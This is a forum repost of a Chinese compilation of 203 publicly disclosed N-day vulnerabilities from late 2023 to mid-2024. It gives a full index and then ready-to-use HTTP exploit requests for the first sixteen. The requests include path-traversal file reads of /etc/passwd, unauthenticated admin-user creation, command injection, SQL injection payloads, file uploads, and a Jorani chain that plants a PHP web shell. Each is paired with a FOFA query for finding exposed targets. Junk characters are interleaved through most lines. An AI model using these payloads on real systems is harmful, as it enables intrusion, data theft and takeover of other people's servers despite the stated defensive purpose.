中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Compilation of publicly disclosed Internet vulnerabilities 202309-202406 -- repost

Author: admin    Time: 2024-6-5 14:31
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive/defensive exercises; we hope this article helps with defense. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To simplify things and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 bandwidth-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japan tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS video management system dmku SQL injection
201. Founder omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

1 a( T, U& I9 y6 Z5 ^. vPOC列表
7 Q1 A2 Z2 A* |$ G
- W, o+ `/ V& a; G: u, y02  W# q/ F1 i9 H
; V. _9 R* z( |0 B8 X' ^. m
1. StarRocks MPP数据库未授权访问
. l+ j. J& D$ t' W# w3 T3 K: GFOFA :title="StarRocks"
, U% N% z6 U: f5 Y9 ~0 Q) nGET /mem_tracker HTTP/1.1- B/ y4 v' o* I/ Z" Q/ v8 ?, R6 U* A
Host: URL9 a4 W; O) h" F* M' ~. v
3 [; J) x) Q4 G- [% X0 W( ~% N5 B
0 R+ w1 a  d) @" s
2. Casdoor系统static任意文件读取& f* g5 f" N; A2 P, f9 w2 j- A
FOFA :title="Casdoor"
, E8 `, N2 ]+ jGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 U" ~& F! q- NHost: xx.xx.xx.xx:9999
& [/ [3 }; C" [. d# Z, \: c7 Q9 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& H0 k; E! h2 U0 Y- R+ AConnection: close9 A; A& E6 P: N7 a8 N  j& j
Accept: */*' \; b  I$ j+ _( ]  h
Accept-Language: en8 R0 M5 v* S& B. @5 i& e
Accept-Encoding: gzip. ~( l4 y' x7 F

4 L1 N0 W6 e: m+ G/ }
+ p5 F9 F, {# h7 W4 U. O3. EasyCVR智能边缘网关 userlist 信息泄漏
" n4 V4 W+ D; q5 O. tFOFA :title="EasyCVR"
8 y* Z7 \5 y- N0 `. V5 WGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.12 P6 f$ p) O3 O2 f3 K- z- r
Host: xx.xx.xx.xx' t4 t4 B7 T# e2 h' @

3 g* E; N' r  B8 v) L! d5 e4 X  }$ |; G: e2 K" t
4. EasyCVR视频管理平台存在任意用户添加$ L: H$ x. d0 c- l, ?, s& @$ [1 Q5 u
FOFA :title="EasyCVR"
) K1 \! t$ p5 L6 v, B# H- V" U
5 v* Q2 M) }  f# W! Q/ S- xpassword更改为自己的密码md5
9 \# b9 o( ]" {& w8 R) p' N$ YPOST /api/v1/adduser HTTP/1.13 y, _, s4 I" I0 r0 F3 `' Q) m( ^/ o
Host: your-ip
( d- t- g  u- c6 {9 hContent-Type: application/x-www-form-urlencoded; charset=UTF-8; U9 O8 T; ?3 i% u$ |# X

' J0 |( }" p( f+ sname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1" A1 ?4 T; v' ^3 a- l" X3 l  `* W

6 M" J) _" U" y( x* U+ o/ k* ^- j4 B" j* Q9 ?9 F
5. NUUO NVR 视频存储管理设备远程命令执行. n% q, s6 _* M. \0 `+ `
FOFA:title="Network Video Recorder Login"" N& _; g+ ?# P
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 W; S. M" p" q$ E9 ]' mHost: xx.xx.xx.xx
; ]/ @8 V# C) j$ v  }  @
7 N( D; y- a2 r' r, e
: G$ u, D* P+ m1 a+ C6. 深信服 NGAF 任意文件读取6 J6 m- u- k2 P8 B
FOFA:title="SANGFOR | NGAF"
7 x. l8 C- X( k7 ?: ], h% GGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.15 Q4 a! }! T: g6 w5 d
Host:
9 n) q6 p* R9 P# x$ M+ f. k
/ D" T; |8 B/ l" T' {2 }+ g3 S$ n/ @8 o% C
7. 鸿运主动安全监控云平台任意文件下载
8 m% O" f' C3 g7 f/ F) U- i, XFOFA:body="./open/webApi.html"8 d* A" G, ]. E0 g
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1* o/ `1 P) }& H& k2 z
Host:4 T1 `# f6 Z% H5 d: {

' I% _- A5 R# H! E& n6 o
- O8 z( u2 o$ E$ W' G! N8. 斐讯 Phicomm 路由器RCE
4 v7 \5 T0 v3 s  Z% w: eFOFA:icon_hash="-1344736688"  _, C# T) R$ |; g, {, P( N
默认账号admin登录后台后,执行操作. e3 o' u9 j( c  D- l* `0 J
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
& x" \+ c. H" C! F" \& w+ ]Host: x.x.x.x
1 R7 W# s5 H4 n9 I4 G$ ACookie: sysauth=第一步登录获取的cookie3 h! R! {" [! W7 C9 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz9 z" Z* Z3 Q7 H7 o3 ]2 ]9 L1 x, B( S
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
5 {7 x' x/ U* ~/ T# V; u% P! N$ @
7 R) S' @( C5 V; y------WebKitFormBoundaryxbgjoytz
, o# t. \- M  R9 MContent-Disposition: form-data; name="wifiRebootEnablestatus"5 p2 l+ U0 @9 O- O
0 q8 {& K6 A: T, B8 l" [' p5 w
%s+ J% T7 b2 ?) X% G5 e9 ^
------WebKitFormBoundaryxbgjoytz9 S' N  m9 G# J% @: q! G" i4 z
Content-Disposition: form-data; name="wifiRebootrange"2 K& R4 I6 T+ T5 a. z( l

, F) C! A  f; o12:00; id;
# t8 b( Q4 j4 ]------WebKitFormBoundaryxbgjoytz
5 ^9 H8 k2 H: S+ R. J2 pContent-Disposition: form-data; name="wifiRebootendrange"
9 e, V7 ^. c; b  Z# l- d8 W6 M  a+ n' {
%s:
5 t& k1 D1 z2 R" m3 B------WebKitFormBoundaryxbgjoytz5 T9 V, O. x' v
Content-Disposition: form-data; name="cururl2"
! D- `; Y8 L2 a& |+ v1 q9 ]' f# H" ~9 ]% F
6 e5 x" q+ r$ {, a) w6 x, r% F$ B' A
------WebKitFormBoundaryxbgjoytz--
2 Q. [, ]" R8 [% l6 P9 M7 I2 U5 K7 e

, A' F; L# g! X4 I9. 稻壳CMS keyword 未授权SQL注入; B+ u5 S7 s* b. p8 m
FOFA:app="Doccms"% q2 _% }( {9 ?
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1/ I( ?4 D: Z7 j2 B
Host: x.x.x.x
3 L! o! v7 R! R5 g
' C/ ^  s' d- Z8 n  c
" v  A4 E+ ?* l2 vpayload为下列语句的二次Url编码( f7 M0 F, C4 F4 \( w

* F" p  P# }7 c' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
0 ^7 T+ I" {3 \0 ?' E$ l) |; V. J4 Q8 ?& y& F# Z
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' e* W  T( g: Y4 T8 p# q
FOFA:icon_hash="953405444"/ h" b6 ?- G1 F2 j7 g( }4 y% [+ N
* L1 X0 s3 E/ l6 g5 T7 O
文件上传后响应中包含上传文件的路径
7 |! A" D2 A( g: a  wPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
7 F1 J" W* x2 d" x  B2 w$ `7 y) w  tHost: x.x.x.x:xx
. K6 w4 P/ J; _, d. M5 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* h+ A; a# F5 |. E$ g, l6 x
Content-Length: 1972 A& t" m: @. D. U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 N- ^1 h; n( z+ s3 V% }Accept-Encoding: gzip, deflate
  Q2 J' w! Q3 }: x% b/ A4 l) f( cAccept-Language: zh-CN,zh;q=0.9
, o' G! w/ f$ d2 f) d( d" C) _Connection: close
+ o9 _( \. D1 ~) M2 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu# Y; r" r2 o/ W% P( |. l3 ^  }& S  p

8 J& @1 ^" |3 X' @1 M% m------WebKitFormBoundaryxdgaqmqu9 o& X+ q- X" v6 u' u! C" z
Content-Disposition: form-data; name="file"filename="icfitnya.txt"' X+ y' e( _# u+ a' O' a( g
Content-Type: text/html1 r" _4 @* A+ {" a/ |
' P# r5 M* R% p( t1 y3 W1 M& U
jmnqjfdsupxgfidopeixbgsxbf
1 @2 U( ]; W* R  ]0 Y------WebKitFormBoundaryxdgaqmqu--1 }! R; J7 I% Y1 `, h; K, O+ c$ O
3 B8 F8 p# k, C6 |1 a: x% T  |

7 P" S+ f) Z( \" \& m5 O11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
2 E! d  z' Y  d! [1 fFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"/ K( e" k% T+ v, T* i
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
: u$ w& M1 B. b+ \- g+ Z% l$ S/ U. KHost: 127.0.0.1
; s( w6 q8 p8 W: _+ WPragma: no-cache! G  N' L7 f! F2 Y. |
Cache-Control: no-cache
9 k$ o' |2 ]6 V; y* q1 KUpgrade-Insecure-Requests: 1. }2 w3 a1 v. ^7 L% n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- f( \4 u/ L( G' m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 t3 I0 e6 z+ U3 G& MAccept-Encoding: gzip, deflate
1 ]* Y2 v! `0 H& |% ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 p$ _4 g, U# ?Connection: close" k- S" y0 y. d

+ E; [; Z5 ?$ ^' x8 i8 ~2 s. R8 N) n3 T( s: r0 q
12. Jorani < 1.0.2 远程命令执行
& e" o  c+ J- m2 X: AFOFA:title="Jorani"6 `0 J/ L2 s- a( B/ k5 T% Z
第一步先拿到cookie
" V0 G: R* H7 X" x$ ZGET /session/login HTTP/1.17 N. {) i% d8 T1 g3 u3 L
Host: 192.168.190.304 y" e: z# k6 D; g  z" [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 l& U  L. U9 Q+ m! {" ]8 m0 wConnection: close
2 E% X! n# Z* C9 @; f$ R0 v, M1 sAccept-Encoding: gzip2 m$ j4 |; \# q  ~  r9 l

1 O2 J. g& K' j, |4 [) G4 a: [8 O5 M# B) b& q
响应中csrf_cookie_jorani用于后续请求, O9 ]% l' `, |* T' H
HTTP/1.1 200 OK/ D* T6 \' O, ?: C+ W6 `  ]" D
Connection: close2 P9 ]- ]$ A+ e! S+ }; I1 H
Cache-Control: no-store, no-cache, must-revalidate
3 ~* R) J: ^; w8 _. @. v' `Content-Type: text/html; charset=UTF-8' ~' ~* {8 F4 I: K0 {/ X7 i# L
Date: Tue, 24 Oct 2023 09:34:28 GMT
- [$ e: z: a/ t, Q) t9 H" |. ~6 t6 eExpires: Thu, 19 Nov 1981 08:52:00 GMT- @0 j( p0 I6 ?3 D# X- {
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
3 {0 `; o( t; D. w8 W$ v5 NPragma: no-cache( V: K6 D3 b, a+ U1 O1 W
Server: Apache/2.4.54 (Debian)
; p% p9 z2 E3 O2 RSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
" r2 W9 F- O. T  ASet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
% X- ]- A( m' d: P" l7 z5 J) o, pVary: Accept-Encoding
' i6 Y3 h7 s( s' k. V1 C4 I$ r: n$ s- M6 s0 z
- V( [2 x& [9 {% J. y
POST请求,执行函数并进行base64编码
: e, V& L( N8 LPOST /session/login HTTP/1.1
0 d3 ?0 g% x3 {& X4 E$ RHost: 192.168.190.30) U; N5 G3 ^  [: C7 r- {* u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 l( b, c  C5 @  M4 @Connection: close
/ S  j" |5 v3 e9 Z* u5 BContent-Length: 252# ]6 _4 Z7 `  e' I" @8 z5 F
Content-Type: application/x-www-form-urlencoded0 Y# z" v% t* w9 L4 q
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; N6 C7 m- h5 Z" {$ Q( k4 a
Accept-Encoding: gzip! Y  f: }) g. N( F2 w/ A

9 I) ?/ d5 y9 s9 x( q7 V: B) j# Scsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor7 j: d7 c3 T1 c5 O. X6 U0 k. o5 D- w
" X0 R( T; {8 X1 S# q6 A; d
+ [& O" B7 y5 \
6 U! z+ U' d9 T( r
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
2 H4 N% c& [' SGET /pages/view/log-2023-10-24 HTTP/1.1/ D/ G1 `7 i9 W  N* d2 P. [. t" K
Host: 192.168.190.307 i0 s! }9 c" K$ \! t  d, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 B- n0 q3 I# E; nConnection: close. H6 ~$ D$ T8 S8 [/ k
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r6 v$ G. d% F+ g* K- E
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=$ z8 P3 S' U5 E  S  ?& N- S. L
X-REQUESTED-WITH: XMLHttpRequest# e/ ?7 @& D) y/ J5 ]  h/ ?
Accept-Encoding: gzip
  P: T1 h* m* F* \+ h" w* R( p/ B# Q, f; q
9 H! {0 X8 y+ c4 Q
13. 红帆iOffice ioFileDown任意文件读取
2 G. K8 H( H0 r$ H6 B( WFOFA:app="红帆-ioffice"
1 V& y2 t% J7 Z' Y% j1 ^. @' QGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1" ~5 K2 w" @. C) }: b& w+ `/ b
Host: x.x.x.x! L8 V8 `9 k2 F! x. L/ m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: r. R: u  N3 j& nConnection: close
  ^7 r  d! z) H- ?Accept: */*
+ A& O) S6 \  m) U4 {/ H; zAccept-Encoding: gzip$ ^9 }; J+ n  u6 j. q! C

3 x' \! p, D7 @4 @: d5 t! B2 N5 h1 p4 O3 v( x5 G# O% f2 T% f
14. 华夏ERP(jshERP)敏感信息泄露8 z$ _* b+ r% q8 ?" _
FOFA:body="jshERP-boot"' i& j1 M$ y3 I5 X
泄露内容包括用户名密码$ \' @) y7 j# m6 D7 N1 _
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
# K% f9 U; c2 l( Q' x+ uHost: x.x.x.x
" S+ ?( ^0 a. R. DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
9 }" N( a8 [- U; R# EConnection: close
8 ?1 m. f3 f) Y/ z3 v5 t! tAccept: */*$ ~( P: c; Q& j& N3 @+ H2 K- U" ^
Accept-Language: en/ }! X7 i: |5 w
Accept-Encoding: gzip5 N* Y) ]" ]0 _* W
) d3 z) p2 Q2 u8 }

4 \& R5 P/ \, d  M8 |% B15. 华夏ERP getAllList信息泄露
% C/ u/ f2 g. \( N% E3 I& [- UCVE-2024-0490+ }2 j* P1 T% h* _& U
FOFA:body="jshERP-boot"
" W# a  i1 ^: s' a8 a7 C8 ~泄露内容包括用户名密码
; O; Z/ }! p5 {' R' qGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
) B1 F# o* l- I( n( CHost: 192.168.40.130:100
& b5 @; e' w  C/ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36: \" s4 k/ O2 d2 ^5 A
Connection: close) A* U3 Y5 B6 _6 I: d5 ]
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' X2 I3 X+ q* a  a! Q3 d9 w9 tAccept-Language: en
) P* h) S8 |4 |3 \" Y" @# b  v# V2 osec-ch-ua-platform: Windows
! e" c6 l9 u1 c3 q2 `) \2 m2 CAccept-Encoding: gzip+ ^" h0 U) F" r& a7 {  \
* ]! z4 `8 ?) B% O' n( _4 t
8 @% z& R0 c  `# X  {. a
16.  红帆HFOffice医微云SQL注入
+ L; ~1 m4 L& w) OFOFA:title="HFOffice"6 S& E7 H3 g* R( L2 ^( b! f
poc中调用函数计算1234的md5值
